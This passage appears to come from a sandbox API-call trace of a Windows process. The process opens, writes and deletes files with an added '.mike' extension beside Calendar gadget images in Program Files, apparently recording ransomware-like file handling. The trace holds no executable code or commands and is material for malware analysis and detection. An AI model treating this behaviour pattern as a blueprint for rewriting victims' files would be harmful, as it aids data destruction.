Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", lpFilePart=0x0) returned 0x4e [0102.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", dwFileAttributes=0x80) returned 0 [0102.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", lpFilePart=0x0) returned 0x4e [0102.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x53 [0102.589] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-down.png.mike")) returned 1 [0102.592] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.592] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.593] WriteFile (in: hFile=0x288, lpBuffer=0x2167688*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2167688*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.595] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0102.595] ReadFile (in: hFile=0x288, lpBuffer=0x21687c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21687c0*, lpNumberOfBytesRead=0x2af080*=0x23e, lpOverlapped=0x0) returned 1 [0102.596] CloseHandle (hObject=0x288) returned 1 [0102.596] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.597] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.597] GetFileType (hFile=0x288) returned 0x1 [0102.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.597] GetFileType (hFile=0x288) returned 0x1 [0102.597] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0102.597] WriteFile (in: hFile=0x288, lpBuffer=0x216c3e4*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x216c3e4*, lpNumberOfBytesWritten=0x2af074*=0x240, lpOverlapped=0x0) returned 1 [0102.597] CloseHandle (hObject=0x288) returned 1 [0102.597] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.597] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.598] GetFileType (hFile=0x288) returned 0x1 [0102.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.598] GetFileType (hFile=0x288) returned 0x1 [0102.599] WriteFile (in: hFile=0x288, lpBuffer=0x216f620*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x216f620*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.599] CloseHandle (hObject=0x288) returned 1 [0102.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ab40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x671ab40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x671ab40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0102.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.599] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2170de0 | out: lpFileInformation=0x2170de0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ab40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x671ab40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x671ab40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0102.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", dwFileAttributes=0x80) returned 0 [0102.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.601] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.601] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x671ab40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x671ab40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x671ab40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x460)) returned 1 [0102.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png", lpFilePart=0x0) returned 0x4d [0102.601] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike", lpFilePart=0x0) returned 0x52 [0102.601] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-hot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev-hot.png.mike")) returned 1 [0102.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.602] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0102.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.603] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.603] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.604] GetFileType (hFile=0x288) returned 0x1 [0102.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.604] GetFileType (hFile=0x288) returned 0x1 [0102.604] CloseHandle (hObject=0x288) returned 1 [0102.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.605] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0102.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.605] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.605] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), fInfoLevelId=0x0, lpFileInformation=0x21735d0 | out: lpFileInformation=0x21735d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x282400f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0102.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.606] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), fInfoLevelId=0x0, lpFileInformation=0x21738ec | out: lpFileInformation=0x21738ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x282400f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0102.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.606] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.606] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.607] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike", lpFilePart=0x0) returned 0x4e [0102.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.607] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.607] GetFileType (hFile=0x288) returned 0x1 [0102.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.607] GetFileType (hFile=0x288) returned 0x1 [0102.607] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0102.607] WriteFile (in: hFile=0x288, lpBuffer=0x217477c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x217477c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.608] CloseHandle (hObject=0x288) returned 1 [0102.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), fInfoLevelId=0x0, lpFileInformation=0x217427c | out: lpFileInformation=0x217427c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x823c5efe, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x823c5efe, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x282400f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xd8)) returned 1 [0102.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png", lpFilePart=0x0) returned 0x49 [0102.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.608] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\bprev.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.609] GetFileType (hFile=0x288) returned 0x1 [0102.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.609] GetFileType (hFile=0x288) returned 0x1 [0102.609] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0102.609] ReadFile (in: hFile=0x288, lpBuffer=0x21758a4, nNumberOfBytesToRead=0x2800, 